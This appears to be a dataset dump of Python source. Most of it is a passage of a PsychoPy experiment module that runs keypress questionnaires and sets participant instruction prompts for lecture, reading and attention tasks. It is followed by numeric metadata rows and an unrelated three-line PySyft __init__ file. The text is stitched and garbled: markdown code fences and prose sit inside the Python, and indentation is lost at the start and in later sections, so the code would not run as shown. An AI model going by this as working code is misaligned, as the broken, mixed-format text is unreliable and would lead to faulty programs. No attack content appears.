#display instructions and wait
message1.draw()
message2.draw()
win.logOnFlip(level=logging.EXP, msg='Display Instructions%d'%(iPrompt+1))
win.flip()
#check for a keypress
thisKey = event.waitKeys(keyList=fwdKeys + backKeys + ['q', 'escape']) # keyList must be a keyword arg; the first positional arg of waitKeys is maxWait
if thisKey[0] in ['q','escape']:
core.quit()
elif thisKey[0] in fwdKeys:
iPrompt += 1
elif thisKey[0] in backKeys:
iPrompt = backPrompt
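RunPrompts' paging logic can be exercised without a window: forward keys advance one page, back keys jump back to `backPrompt`. A pure-logic sketch (no PsychoPy) with a scripted, hypothetical key sequence standing in for `event.waitKeys`:

```python
prompts = ['A', 'B', 'C']
# Hypothetical keypresses: page forward twice, jump back, then page through again.
keys = ['space', 'space', 'backspace', 'space', 'space', 'space']
fwdKeys, backKeys, backPrompt = ['space'], ['backspace'], 0

iPrompt, shown = 0, []
for k in keys:
    if iPrompt >= len(prompts):
        break
    shown.append(prompts[iPrompt])   # the prompt displayed before this keypress
    if k in fwdKeys:
        iPrompt += 1                 # advance to the next prompt
    elif k in backKeys:
        iPrompt = backPrompt         # jump back to the designated prompt

print(shown)  # ['A', 'B', 'C', 'A', 'B', 'C']
```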

# Display questions and let user select each one's answer with a single keypress.
def RunQuestions(question_list,options_list,win,message1,message2, name='Question', questionDur=float('inf'), isEndedByKeypress=True, respKeys=['1','2','3','4']):
    # set up
    nQuestions = len(question_list)
    allKeys = ['']*nQuestions
    trialClock = core.Clock()
    iQ = 0
    while iQ < nQuestions:
        print('iQ = %d/%d'%(iQ+1,nQuestions))
        # build the response text to be displayed to the subject
        respText = ""
        for iResp in range(len(options_list[iQ])):
            respText += '%d) %s\n'%((iResp+1),options_list[iQ][iResp])
        # set text
        message1.setText(question_list[iQ])
        message2.setText(respText)
        # draw question & answers
        message1.draw()
        message2.draw()
        # flush the key buffer and mouse movements
        event.clearEvents()
        # put the question on the screen
        win.logOnFlip(level=logging.EXP, msg='Display %s%d'%(name,iQ))
        win.flip()
        # reset the clock to zero - this call should take less time than window.flip,
        # so resetting after the flip should be slightly more accurate.
        trialClock.reset()
        # wait for a keypress
        endQuestion = False
        while trialClock.getTime() < questionDur and not endQuestion:
            newKeys = event.getKeys(keyList=(respKeys + ['q','escape','backspace','period']), timeStamped=trialClock)
            for newKey in newKeys:
                if newKey[0] in ['q','escape']: # quit keys: end this question
                    endQuestion = True
                elif newKey[0] == 'backspace': # go back one question
                    print('backspace')
                    iQ = max(0,iQ-1)
                    endQuestion = True
                elif newKey[0] == 'period': # skip fwd without recording a response
                    iQ += 1
                    endQuestion = True
                else: # response keys
                    iA = respKeys.index(newKey[0]) # convert from key to index in respKeys list
                    allKeys[iQ] = (iA+1, newKey[1]) # tuple of 1-based answer index and response time
                    if isEndedByKeypress:
                        iQ += 1
                        endQuestion = True
        if len(newKeys)>0 and newKey[0] in ['q','escape']:
            break # quit requested: end the question loop
        elif trialClock.getTime() >= questionDur:
            iQ += 1 # question timed out: advance
    # return result
    return allKeys
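# The keypress-to-answer bookkeeping in RunQuestions can be sketched on its
# own: the pressed key is looked up in respKeys and stored as a (1-based
# answer index, response time) tuple. The key name and time stamp below are
# invented values standing in for what event.getKeys(timeStamped=...) returns.

```python
demoRespKeys = ['1','2','3','4']
demoKey = ('3', 1.72)                    # (key name, seconds since clock reset)
demoIA = demoRespKeys.index(demoKey[0])  # 0-based position in the key list
demoAnswer = (demoIA+1, demoKey[1])      # stored as answer 3, 1.72 s after onset
```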

# Display questions and let the subject navigate selection up and down before selecting.
def RunQuestions_Move(question_list,options_list, win, name='Question', questionDur=float('inf'), isEndedByKeypress=True, upKey='up', downKey='down', selectKey='enter'):
    # set up
    nQuestions = len(question_list)
    allKeys = ['']*nQuestions
    trialClock = core.Clock()
    iQ = 0
    iA = 0
    respKeys = [upKey,downKey,selectKey]
    # make visuals
    from psychopy import visual
    questionText = visual.TextStim(win, pos=[0,+.5], wrapWidth=1.5, color='#000000', alignHoriz='center', name='questionText', text="aaa", units='norm')
    optionsText = []
    for iResp in range(len(options_list[0])):
        optionsText.append(visual.TextStim(win, pos=[0,-.1*iResp], wrapWidth=1.5, color='#000000', alignHoriz='center', name='option%d'%(iResp+1), text="aaa", units='norm', autoLog=False))
    while iQ < nQuestions:
        print('iQ = %d/%d'%(iQ+1,nQuestions))
        # default response is the middle option (rounding down)
        iA = int((len(options_list[iQ])-1)*0.5)
        # set and draw text
        questionText.setText(question_list[iQ])
        questionText.draw()
        optionsText[iA].bold = True # make currently selected answer bold
        for iResp in range(len(options_list[iQ])):
            optionsText[iResp].setText('%d) %s'%((iResp+1),options_list[iQ][iResp]))
            optionsText[iResp].draw()
        # flush the key buffer and mouse movements
        event.clearEvents()
        # put the question on the screen
        win.logOnFlip(level=logging.EXP, msg='Display %s%d'%(name,iQ))
        win.flip()
        # reset the clock to zero - this call should take less time than window.flip,
        # so resetting after the flip should be slightly more accurate.
        trialClock.reset()
        # wait for a keypress
        endQuestion = False
        while trialClock.getTime() < questionDur and not endQuestion:
            newKeys = event.getKeys(keyList=(respKeys + ['q','escape','backspace','period']), timeStamped=trialClock)
            for newKey in newKeys:
                if newKey[0] in ['q','escape']: # quit keys: end this question
                    endQuestion = True
                elif newKey[0] == 'backspace': # go back one question
                    print('backspace')
                    iQ = max(0,iQ-1)
                    endQuestion = True
                elif newKey[0] == 'period': # skip fwd without recording a response
                    iQ += 1
                    endQuestion = True
                elif newKey[0] == upKey: # move selection up
                    optionsText[iA].bold = False # remove old bold
                    iA = max(0, iA-1) # update answer, clamped to the first option
                    optionsText[iA].bold = True # make newly selected answer bold
                    # redraw everything
                    questionText.draw()
                    for iResp in range(len(options_list[iQ])):
                        optionsText[iResp].draw()
                    win.flip()
                elif newKey[0] == downKey: # move selection down
                    optionsText[iA].bold = False # remove old bold
                    iA = min(len(options_list[iQ])-1, iA+1) # update answer, clamped to the last option
                    optionsText[iA].bold = True # make newly selected answer bold
                    # redraw everything
                    questionText.draw()
                    for iResp in range(len(options_list[iQ])):
                        optionsText[iResp].draw()
                    win.flip()
                elif newKey[0] == selectKey:
                    # log response
                    allKeys[iQ] = (iA+1, newKey[1]) # tuple of 1-based answer index and response time
                    logging.log(level=logging.EXP, msg='Responded %d'%(iA+1))
                    optionsText[iA].bold = False # remove old bold
                    iQ += 1 # advance question index
                    if isEndedByKeypress:
                        endQuestion = True
                else:
                    print('pressed %s'%newKey[0])
        if len(newKeys)>0 and newKey[0] in ['q','escape']:
            break # quit requested: end the question loop
    # return result
    return allKeys

# ===== DECLARE PROMPTS =====
def GetPrompts(experiment,promptType,params):
    if experiment == 'VidLecTask_dict.py':
        if promptType == 'Test':
            # declare default list of prompts
            topPrompts = ["You are about to watch a video of an academic lecture. Keep your eyes open and try to absorb as much of the material as you can.",
                "When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'Reverse':
            # prompts for BACKWARDS MOVIE:
            topPrompts = ["You are about to watch a video of an academic lecture played backwards. Try to ignore it and think about something else.",
                "This is the LOW ATTENTION RUN: it's extremely important that you do NOT focus on the lecture during this run.",
                "Stay awake and keep your eyes open, but let your mind wander freely: try not to do any repetitive task like counting or replaying a song.",
                "If at any time you notice that your mind hasn't been wandering as instructed, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'Wander':
            # prompts for LOW ATTENTION:
            topPrompts = ["You are about to watch a video of an academic lecture. Try to ignore it and think about something else.",
                "This is the LOW ATTENTION RUN: it's extremely important that you do NOT focus on the lecture during this run.",
                "Stay awake and keep your eyes open, but let your mind wander freely: try not to do any repetitive task like counting or replaying a song.",
                "When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
                "If at any time you notice that your mind hasn't been wandering as instructed, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'Attend':
            # prompts for HIGH ATTENTION
            topPrompts = ["You are about to watch a video of an academic lecture. Try to absorb as much of the material as you can.",
                "This is the HIGH ATTENTION RUN: it's extremely important that you pay close attention to the lecture during this run.",
                "When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
                "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
        bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    elif experiment == 'VidLecTask_vigilance.py':
        if promptType == 'Default':
            # declare default list of prompts
            topPrompts = ["You are about to watch a video of an academic lecture. Keep your eyes open and try to absorb as much of the material as you can.",
                "When the lecture is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
                "During the lecture, a %s dot will display in the middle of the screen. Look at the dot for the duration of the lecture. When the dot turns %s, press the %c key with your right index finger."%(params['dotColor'],params['targetColor'],params['respKey'].upper()),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the lecture, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Just before and after the lecture, a cross will appear. Look directly at the cross while it's on the screen."]
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
        bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    elif experiment.startswith('ReadingTask') or experiment.startswith('ReadingImageTask_eyelink') or experiment.startswith('DistractionTask'):
        if promptType == 'Test':
            # declare default list of prompts
            topPrompts = ["You are about to read the transcript of an academic lecture. Try to absorb as much of the material as you can.",
                "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                "When the reading is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'Read':
            topPrompts = ["You are about to read the transcript of an academic lecture. Try to absorb as much of the material as you can.",
                "When the session is over, you'll be asked a few questions about the material.",
                # "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
                "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question within a few seconds using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'AttendReading':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
                "When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
                # "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
                "Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
                "When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
                "In this session, pay attention to ONLY the reading and IGNORE the audio."]
        elif promptType == 'AttendReadingFirst':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
                "When the session is over, you'll be asked a few questions about the reading and audio.",
                "Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
                "When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
                "For the first part of this session, pay attention to ONLY the reading and IGNORE the audio."]
        elif promptType == 'AttendReading_short':
            topPrompts = ["In this session, pay attention to ONLY the reading and IGNORE the audio."]
        elif promptType == 'AttendReadingFirst_short':
            topPrompts = ["For the first part of this session, pay attention to ONLY the reading and IGNORE the audio."]
        elif promptType == 'AttendReading_switch':
            topPrompts = ["For the rest of the session, pay attention to ONLY the reading and IGNORE the audio."]
        elif promptType == 'AttendBoth':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
                "When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
                # "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
                "Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
                "When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
                "In this session, pay attention to BOTH the reading AND the audio."]
        elif promptType == 'AttendBothFirst':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will hear audio from a different lecture.",
                "When the session is over, you'll be asked a few questions about the reading and audio.",
                "Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
                "When you're done reading a page, press the '%s' key to advance to the next one. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen.",
                "For the first part of this session, pay attention to BOTH the reading AND the audio."]
        elif promptType == 'AttendBoth_short':
            topPrompts = ["In this session, pay attention to BOTH the reading AND the audio."]
        elif promptType == 'AttendBothFirst_short':
            topPrompts = ["For the first part of this session, pay attention to BOTH the reading AND the audio."]
        elif promptType == 'AttendBoth_switch':
            topPrompts = ["For the rest of the session, pay attention to BOTH the reading AND the audio."]
        elif promptType == 'AttendLeft':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will sometimes hear audio from a different lecture.",
                "On some trials, a lecture will play in only your left ear. On other trials, a DIFFERENT lecture will play in only your right ear.",
                "Only the reading and the LEFT ear lecture are important. When the audio is in your LEFT ear, try to absorb as much of BOTH the reading AND audio material as you can.",
                "When the audio is in your RIGHT ear, IGNORE the audio and just absorb the reading.",
                "When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
                # "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
                "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'AttendRight':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will sometimes hear audio from a different lecture.",
                "On some trials, a lecture will play in only your right ear. On other trials, a DIFFERENT lecture will play in only your left ear.",
                "Only the reading and the RIGHT ear lecture are important. When the audio is in your RIGHT ear, try to absorb as much of BOTH the reading AND audio material as you can.",
                "When the audio is in your LEFT ear, IGNORE the audio and just absorb the reading.",
                "When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
                # "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
                "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'AttendForward':
            topPrompts = ["You are about to read the transcript of an academic lecture. At the same time, you will sometimes hear audio from a different lecture.",
                "On some trials, a lecture will play forward. On other trials, the lecture will play backward.",
                "Only the reading and the forward lecture are important. When the audio is playing FORWARD, try to absorb as much of BOTH the reading AND audio material as you can.",
                "When the audio is playing BACKWARD, IGNORE the audio and just absorb the reading.",
                "When the session is over, you'll be asked a few questions about the reading. Questions about the audio will happen at the end of all the sessions.",
                # "You will have %.1f seconds to read each page. When the text starts to fade, that time is almost up."%(params['maxPageTime']),
                "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                # "If at any time you notice that your mind has been wandering, press the '%c' key with your left index finger."%params['wanderKey'].upper(),
                # "Sometimes during the reading, a question about your attention may appear. When this happens, answer the question using the number keys.",
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'TestReading':
            topPrompts = ["You will now be asked a few questions about the text you just read. Answer using the number keys.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time.",
                "If you don't know the answer, take your best guess."]
        elif promptType == 'TestReading_box':
            topPrompts = ["You will now be asked a few questions about the text you just read. Answer using the button box.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time.",
                "If you don't know the answer, take your best guess."]
        elif promptType == 'TestBoth':
            topPrompts = ["You will now be asked a few questions about the lectures you just read and heard. Answer using the number keys.",
                "Some questions may be on material you were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time."]
        elif promptType == 'Practice':
            topPrompts = ["You are about to read the transcript of an academic lecture. Try to absorb as much of the material as you can.",
                # "Press the '%s' key to advance to the next page. If you don't advance within %.1f seconds, it will advance automatically. If the text starts to fade, that time is almost up."%(params['pageKey'].upper(),params['maxPageTime']),
                "Try to read top to bottom without skipping forward or back. Read as quickly as you can while still absorbing the material.",
                "This session is just practice. When you're done reading a page, press the '%s' key to advance to the next one."%(params['pageKey'].upper()),
                "Between pages, a cross will appear. Look directly at the cross while it's on the screen."]
        elif promptType == 'None':
            topPrompts = []
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        if promptType == 'None':
            bottomPrompts = []
        else:
            bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
            bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    elif experiment.startswith('ReadingTask_questions'):
        if promptType == 'Test':
            # declare default list of prompts
            topPrompts = ["You will now be asked a few questions about the text you just read. Answer using the number keys.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time.",
                "If you don't know the answer, take your best guess."]
        elif promptType == 'TestBoth':
            # declare prompts for questions on both reading and audio.
            topPrompts = ["You will now be asked a few questions about the lectures you just read and heard. Answer using the number keys.",
                "Some questions may be on material you were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time."]
        elif promptType == 'TestSound':
            # declare prompts for questions on audio.
            topPrompts = ["You will now be asked a few questions about the lecture you just heard. Answer using the number keys.",
                "Some questions may be on material you didn't hear or were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time."]
        elif promptType == 'TestSound_box':
            # declare prompts for questions on audio.
            topPrompts = ["You will now be asked a few questions about the lecture you just heard. Answer using the button box.",
                "Some questions may be on material you didn't hear or were asked to ignore. Please try to answer anyway. If you don't know the answer, take your best guess.",
                "There's no time limit on each question, but try to answer in a reasonable amount of time."]
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
        bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    elif experiment.startswith('ColorVigilanceTask'):
        if promptType == 'Default':
            # declare default list of prompts
            topPrompts = ["During this task, a %s dot will display in the middle of the screen. Look at the dot for the duration of the task. When the dot turns %s, press the %c key with your right index finger."%(params['dotColor'],params['targetColor'],params['respKey'].upper()),
                "Just before and after each block of trials, a cross will appear. Look directly at the cross while it's on the screen."]
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
        bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    elif experiment.startswith('SingingTask'):
        if promptType == 'Default':
            # declare default list of prompts
            topPrompts = ["During this task, you will be asked to perform scales, speak, or sing while keeping your head still.",
                "Just before each exercise, a cross will appear. Look directly at the cross while it's on the screen.",
                "Before each of these trials, you will see a brief countdown. Please start the scale/speech/song when it reaches 0.",
                "Once you've started, use the change in numbers as your beat. Stop when the count is over and the cross reappears."]
        elif promptType == 'CountImagineSing':
            # declare default list of prompts
            topPrompts = ["During this task, you will be asked to COUNT along with the beat, IMAGINE singing, or SING while keeping your head still.",
                "Just before each exercise, a cross will appear. Look directly at the cross while it's on the screen.",
                "Before each of these exercises, you will see a brief countdown. Please start the exercise when it reaches 0.",
                "Once you've started, use the change in numbers as your beat. Stop when the count is over and the cross reappears."]
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
        bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    elif experiment.startswith('AuditorySequenceTask'):
        if promptType == 'Default':
            # declare default list of prompts
            topPrompts = ["During this task, you will see a fixation cross that changes colors. Look directly at the cross while it's on the screen.",
                "On each trial, you will feel two sequences of taps on your fingers. After the second sequence, the cross will turn yellow.",
                "When the cross turns yellow, press %s if the two sequences were the same and %s if they were different."%(params['respKeys'][0],params['respKeys'][1])]
        else:
            raise Exception('Prompt Type %s not recognized!'%promptType)
        # declare bottom prompts
        bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
        bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('MultiTaskAvWithCheckerboard'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["During this task, you will see a fixation cross, words, and checkerboard patterns. Look directly at the center of the screen during the whole run.",
"You will also hear sounds. A cue before each block will tell you whether you should respond to the sounds or the written words, and how you should respond.",
"Respond AS QUICKLY AS POSSIBLE to the words or sounds according to what the cue asks you to do."]
elif promptType == 'Long':
# declare default list of prompts
topPrompts = ["During this task, you will see a fixation cross, words, and checkerboard patterns. Keep your eyes open and look directly at the center of the screen during the whole run.",
"You will also hear sounds. A cue before each block will tell you whether you should respond to the sounds or the written words, and how you should respond.",
"'Visual: Button' indicates that you should press a button as soon as you see the fixation cross change into something else. Ignore the checkerboards and sounds.",
"'Visual: Add' indicates that you should mentally add all the numbers you see. Keep track in your head until the end of the block, when you will be asked for your count. Ignore the checkerboards and sounds and avoid moving.",
"'Audio: Button' indicates that you should press a button as soon as you hear speech. Ignore the checkerboards and text visuals.",
"'Audio: Add' indicates that you should mentally add all the numbers you hear. Keep track in your head until the end of the block, when you will be asked for your count. Ignore the checkerboards and text visuals and avoid moving.",
"'Rest' indicates that you should ignore all visual and auditory stimuli and think about other things during the block.",
"Respond AS QUICKLY AS POSSIBLE to the words or sounds according to what the cue asks you to do."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('MovieTask'):
if promptType == 'Test':
# declare default list of prompts
topPrompts = ["You are about to watch a movie. Keep your eyes open and try to absorb as much of the movie as you can.",
"When the movie is over, you'll be asked a few questions about it. Answer the questions using the number keys.",
"Just before and after the movie, a cross will appear. Look directly at the cross while it's on the screen."]
elif promptType == 'Watch':
topPrompts = ["You are about to watch a movie. Keep your eyes open and try to absorb as much of the movie as you can.",
"Just before and after the movie, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('AuditorySpeedReadingTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["In this run, you will hear a voice reading text. Try to absorb as much of the reading as you can.",
"When the reading is over, you'll be asked a few questions about it. Answer the questions using the button box.",
"Throughout the whole run, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
elif experiment.startswith('VisualSpeedReadingTask'):
if promptType == 'Default':
# declare default list of prompts
topPrompts = ["In this run, you will see text flashed in front of you. Try to absorb as much of the reading as you can.",
"When the reading is over, you'll be asked a few questions about it. Answer the questions using the button box.",
"Between blocks of text, a cross will appear. Look directly at the cross while it's on the screen."]
else:
raise Exception('Prompt Type %s not recognized!'%promptType)
# declare bottom prompts
bottomPrompts = ["Press any key to continue."]*len(topPrompts) # initialize
bottomPrompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
else:
raise Exception('Experiment %s not recognized!'%experiment)
# return the prompts
return (topPrompts,bottomPrompts)
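# Illustrative re-sketch of the branch-per-experiment logic above as a
# table-driven lookup; prompt strings mirror the source, but the helper
# name build_prompts and the dict layout are hypothetical.
```python
PROMPTS = {
    ('MovieTask', 'Watch'): [
        "You are about to watch a movie. Keep your eyes open and try to absorb as much of the movie as you can.",
        "Just before and after the movie, a cross will appear. Look directly at the cross while it's on the screen.",
    ],
}

def build_prompts(experiment, prompt_type):
    try:
        top_prompts = PROMPTS[(experiment, prompt_type)]
    except KeyError:
        raise ValueError('Experiment %s / prompt type %s not recognized!'
                         % (experiment, prompt_type))
    # every page but the last gets the generic continue prompt
    bottom_prompts = ["Press any key to continue."] * len(top_prompts)
    bottom_prompts[-1] = "WHEN YOU'RE READY TO BEGIN, press any key."
    return top_prompts, bottom_prompts
```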
| 72.652597 | 282 | 0.632748 | 6,067 | 44,754 | 4.656502 | 0.093786 | 0.007256 | 0.009734 | 0.015044 | 0.822661 | 0.807617 | 0.797848 | 0.788928 | 0.776114 | 0.771548 | 0 | 0.006106 | 0.286455 | 44,754 | 615 | 283 | 72.770732 | 0.878562 | 0.201189 | 0 | 0.618938 | 0 | 0.279446 | 0.539811 | 0.005229 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013857 | false | 0 | 0.023095 | 0 | 0.050808 | 0.011547 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bb5d7001923cc4b6bce46b57e001f9c15b3613f0 | 123 | py | Python | syft/execution/__init__.py | stephenjfox/PySyft | a27deed0d07c199de039fafd323164640c9c8f6d | [
"Apache-2.0"
] | 2 | 2020-12-30T11:21:43.000Z | 2021-12-04T16:25:53.000Z | syft/execution/__init__.py | stephenjfox/PySyft | a27deed0d07c199de039fafd323164640c9c8f6d | [
"Apache-2.0"
] | 1 | 2020-04-07T13:36:44.000Z | 2020-04-07T13:36:44.000Z | syft/execution/__init__.py | JMBehnken/PySyft | 35012f5bf55628bb19761d5f40d03181fbbb1766 | [
"Apache-2.0"
] | 1 | 2021-12-31T09:27:55.000Z | 2021-12-31T09:27:55.000Z | from syft.execution.plan import func2plan
from syft.execution.plan import method2plan
from syft.execution.plan import Plan
| 30.75 | 43 | 0.853659 | 18 | 123 | 5.833333 | 0.388889 | 0.228571 | 0.485714 | 0.6 | 0.771429 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018018 | 0.097561 | 123 | 3 | 44 | 41 | 0.927928 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
